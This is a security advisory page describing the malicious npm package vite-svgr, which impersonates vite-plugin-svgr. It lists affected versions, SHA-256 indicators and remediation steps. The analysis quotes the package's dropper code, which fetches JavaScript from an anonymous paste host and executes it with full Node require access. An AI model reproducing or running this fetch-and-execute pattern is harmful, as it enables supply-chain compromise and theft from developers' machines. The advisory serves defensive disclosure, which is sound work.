Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

vite-svgrnpm

Malicious code in vite-svgr (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5708
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall vite-svgr

What this malware does

Package name vite-svgr impersonates the popular vite-plugin-svgr, but the shipped code is a fork of tsconfig-paths (package.json description: 'Load node modules according to tsconfig paths') with an added remote-code-execution dropper at lib/mapProps.js. The dropper performs axios.get('https://www.jsonkeeper.com/b/EQUBH', { headers: { 'x-secret-key': '_' } }) and then runs the response body's Cookie field via new Function('require', s)(require) — arbitrary JavaScript with full Node require access executed under the installer's user. The code is reachable from the package's main via the exported configJson(...), which spawns node lib/mapProps.js detached, so any consumer that imports this package and calls configJson triggers fetch-and-execute against an anonymous, mutable paste host. The combination of name impersonation, fork of an unrelated library, and remote-payload-execution is the canonical supply-chain attack shape.

Malicious versions

2 flagged
1.1.21.1.3

Indicators of compromise (SHA-256)

a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5
d238c0e37d7a415f10030826af53fbff9c537bfd527553c8005fd51f6499f0c4

Frequently asked questions

No. vite-svgr on npm has been identified as a malicious package (versions 1.1.2, 1.1.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006215IN-MAL-2026-006214

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
vite-svgr (npm) malicious package — MAL-2026-5708 | O3 Security